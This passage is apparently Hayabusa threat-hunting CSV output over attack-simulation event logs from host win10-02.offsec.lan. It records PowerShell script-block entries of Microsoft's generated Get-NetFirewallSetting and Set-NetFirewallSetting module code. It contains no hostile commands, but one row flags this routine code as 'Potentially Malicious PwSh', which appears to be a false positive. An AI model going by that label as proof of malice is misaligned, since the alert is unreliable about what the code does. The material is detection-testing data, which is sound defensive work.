= $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecuritySettingData' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function 
__cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters 
$__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallSetting' -Alias '*' function Set-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetSecuritySettingData')] 
[ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption] ${Exemptions}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulFtp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulPptp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${RequireFullAuthSupport}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck] ${CertValidationLevel}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT] ${AllowIPsecThroughNAT}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSAIdleTimeSeconds}, [Parameter(ParameterSetName='Query 
(cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding] ${KeyEncoding}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing] ${EnablePacketQueuing}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName 
)) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Exemptions')) { [object]$__cmdletization_value = ${Exemptions} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulFtp')) { [object]$__cmdletization_value = ${EnableStatefulFtp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulPptp')) { [object]$__cmdletization_value = ${EnableStatefulPptp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTransportAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTunnelAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTransportAuthorizationList')) {",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.893 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecuritySettingData' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() 
Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { 
$__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallSetting' -Alias '*' function Set-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetSecuritySettingData')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption] ${Exemptions}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulFtp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulPptp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${RequireFullAuthSupport}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck] ${CertValidationLevel}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT] ${AllowIPsecThroughNAT}, [Parameter(ParameterSetName='Query (cdxml)')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSAIdleTimeSeconds}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding] ${KeyEncoding}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing] ${EnablePacketQueuing}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = 
$__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Exemptions')) { [object]$__cmdletization_value = ${Exemptions} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulFtp')) { [object]$__cmdletization_value = ${EnableStatefulFtp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 
'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulPptp')) { [object]$__cmdletization_value = ${EnableStatefulPptp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTransportAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTunnelAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTransportAuthorizationList')) {",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.893 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"[object]$__cmdletization_value = ${RemoteUserTransportAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter 
= [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTunnelAuthorizationList} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireFullAuthSupport')) { [object]$__cmdletization_value = ${RequireFullAuthSupport} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
